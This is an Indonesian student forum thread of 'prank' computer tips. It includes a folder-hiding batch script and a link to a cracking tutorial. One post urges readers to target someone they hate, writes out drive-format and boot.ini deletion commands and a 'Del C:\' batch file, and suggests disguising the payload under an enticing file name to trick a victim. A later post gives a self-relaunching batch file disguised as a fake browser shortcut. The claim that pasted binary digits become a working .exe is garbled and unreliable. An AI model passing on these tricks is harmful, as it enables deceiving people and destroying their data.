Forum Himpunan Mahasiswa Elektronika Instrumentasi STTN - BATAN
 
PortalPortal  IndeksIndeks  FAQFAQ  PencarianPencarian  AnggotaAnggota  GroupGroup  PendaftaranPendaftaran  LoginLogin  Elins-MailElins-Mail  
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Top posters
Admin
 
THE-DADANG
 
detik
 
Distorsi
 
anompa
 
Anigamusuk02
 
aland5
 
tjantxiotsun
 
YudhaKris
 
arial
 
Login
Username:
Password:
Login otomatis: 
:: Lupa password?

Share | 
 

 Tips Jahil untuk Komputer anda

Go down 
PengirimMessage
detik
Moderator
Moderator
avatar

Jumlah posting : 19
Lokasi : Tanah Air Indonesia
Prodi - Angkatan : Elins - 2007
Registration date : 06.07.08

PostSubyek: Tips Jahil untuk Komputer anda   Tue 08 Jul 2008, 12:21

ada yang punya tip dan trik jahil ga?
Twisted Evil Twisted Evil

hehehe

saya punya tutorial cracking nih
bagi yang pengen donlot
klik disini yah

http://www.geocities.com/detik19/tutorial_cracking.zip

selamat mencoba Cool Cool
Kembali Ke Atas Go down
Lihat profil user
detik
Moderator
Moderator
avatar

Jumlah posting : 19
Lokasi : Tanah Air Indonesia
Prodi - Angkatan : Elins - 2007
Registration date : 06.07.08

PostSubyek: Re: Tips Jahil untuk Komputer anda   Tue 08 Jul 2008, 12:27

cara simple, mudah ga ribet, cuman buat ngelabuin doang..

copas script dibawah ini ke notepad atau semacemnya..

Code:
  @ECHO OFF
    arief-area.blogspot.com kunci folder
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST kunci.bat goto MDLOCKER
    :CONFIRM
    echo Serius nich mau Kunci ??(Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Foldernya dah terkunci
    goto End
    :UNLOCK
    echo [arief-area.blogspot.com] masukin passwordnya dulu keyz!!
    set/p "pass=>"
    if NOT %pass%== arief-area goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDLOCKER
    md Locker
    echo Foldernya berhasil di buat
    goto End
    :End

save as dengan nama kunci.bat.. udah beres..
ntar bakalan muncul folder baru dengan nama "locker" nah file yg mau lw umpetin masukin situ aja, trus doble klik kembali file .bat nya..
kalo mau buka isi'in passwordnya "arief-area" lw liat aja tuh scriptnya pelajarin sendiri..

ini buat ngelabuin aja biar file kita ga keliatan, coz kalo mau dibuka sama orang laen mah gampang tinggal edit aja tuh file .bat nya cari passwordnya.. ketemu deh..

nih cara yg keren mah lewat registry..
Code:
HKEY_LOCAL_MACHINE-SOFTWARE-Microsoft-Windows-currentVersions-Explorer-advanced-
folder-hidden-SHOWALL
cari subkey yg ada di kanan namanya "checkedvalue" ganti nilainya dari 1 menjadi 0..
buat balikin ke semula ganti lagi nilainya dari 0 menjadi 1..

jadi semua file yg kita hidden ga bakaln bisa di muncul Twisted Evil Twisted Evil Twisted Evil
Kembali Ke Atas Go down
Lihat profil user
Distorsi
Pemula
Pemula


Jumlah posting : 17
Registration date : 09.07.08

PostSubyek: Re: Tips Jahil untuk Komputer anda   Wed 09 Jul 2008, 09:56

wah cadas bro
skrg aq juga punya


coba buat komputer orang yg lw benci, jangan di coba dikomputer temen
apalagi di komputer kita sendiri

nih buat format ulang HDD
copy kode binary ini di notepad

Code:
01001011000111110010010101010101010000011111100000

save trus jadi'in file .exe.. pake namanya yg bikin orang pengen klik.misal
megawati_bugil.exe, trus kirim ke komputer korban..
kalo udah di dobble klik, lw tau dong apa yg bakal terjadi..
nih ada pilihannya..:

format c:\ /Q/X -- u/ format drive c:\

Code:
01100110011011110111001001101101011000010111010000 1000000110001100111010010111000010000000101111010100010010111101011000

format d:\ /Q/X -- u/ format drive d:\

Code:
01100110011011110111001001101101011000010111010000 1000000110010000111010010111000010000000101111010100010010111101011000

format a:\ /Q/X -- u/ format drive a:\

Code:
01100110011011110111001001101101011000010111010000 1000000110000100111010010111000010000000101111010100010010111101011000
Del /F/S/Q c:\boot.ini -- bikin komputer lw ga bisa booting

Code:
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011101001011100011000100110
111101 1011110111010000101110011010010110111001101001
gini juga bisa,hapus drive C:
Code:

    @Echo off
    Del C:\ *.*|y

save jadi dell.bat

udah segitu aja..
Twisted Evil Twisted Evil Twisted Evil Twisted Evil
Kembali Ke Atas Go down
Lihat profil user
Admin
Administrateur
Administrateur
avatar

Jumlah posting : 40
Lokasi : Lab. Komp
Prodi - Angkatan : Elins 2007
Registration date : 06.07.08

PostSubyek: Re: Tips Jahil untuk Komputer anda   Wed 09 Jul 2008, 15:54

wah serem juga yah Shocked Shocked

jangan sampe kompiku digituin pale pale pale

buat pengetahuan sih gapapa


lanjutt Arrow Arrow

_________________
Regards,

Admin
Kembali Ke Atas Go down
Lihat profil user http://elins-sttn.5forum.net
anompa
Pemula
Pemula
avatar

Jumlah posting : 16
Lokasi : Kledokan CT XIX
Prodi - Angkatan : Elins 2008
Registration date : 30.03.10

PostSubyek: Re: Tips Jahil untuk Komputer anda   Thu 22 Apr 2010, 07:23

Wah saya paling ga berani iseng ama pacar sendiri (My Lapie)

@mas detik : itu bisa di taruh di F.Disk kan ya? tapi kalo seumpama orang pinjem F.Disk kita, trus disangka tu kosong, trus di Format.. yah.. datanya ilang dong... (soalnya saya pingin transfer data2 yang agak privasi.. kalo diliat orang kan gag enak,,hehe)

@distorsi : jahat banget ni triknya..
Kembali Ke Atas Go down
Lihat profil user
anompa
Pemula
Pemula
avatar

Jumlah posting : 16
Lokasi : Kledokan CT XIX
Prodi - Angkatan : Elins 2008
Registration date : 30.03.10

PostSubyek: Re: Tips Jahil untuk Komputer anda   Thu 22 Apr 2010, 07:35

Ni ada trik jahil buat komputer orang.. caranya :

buka notepad simpen dengan (nama file).bat

start
start
start
start
start
start
start
start
start
start
start
start

(nama
file).bat



trus buat shortcut palsu terserah deh mo apa tapi
aku saranin shortcutnya browser mozilla ato apa... trus taro aja di desktop target.. Very Happy

(Efeknya : nanti akan mbuka CMD yang buanyak banget, ampe komputer tu isinya window yang banyak banget ampe keluar2 layar...)
Kembali Ke Atas Go down
Lihat profil user
THE-DADANG
Moderator
Moderator
avatar

Jumlah posting : 34
Lokasi : Lab Kendali STTN-BATAN
Prodi - Angkatan : Elins 2007
Registration date : 07.07.08

PostSubyek: Re: Tips Jahil untuk Komputer anda   Fri 16 Jul 2010, 08:07

Sayang sekali kalau cara itu hanya digunakan untuk menjahili orang. Padahal cara itu dapat digunakan untuk memaksa membuka CMD ketika ada serangan virus yang memblokir CMD
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: Tips Jahil untuk Komputer anda   

Kembali Ke Atas Go down
 
Tips Jahil untuk Komputer anda
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Elins STTN - BATAN :: Hoby dan Gaya Hidup :: Komputer dan Jaringan-
Navigasi: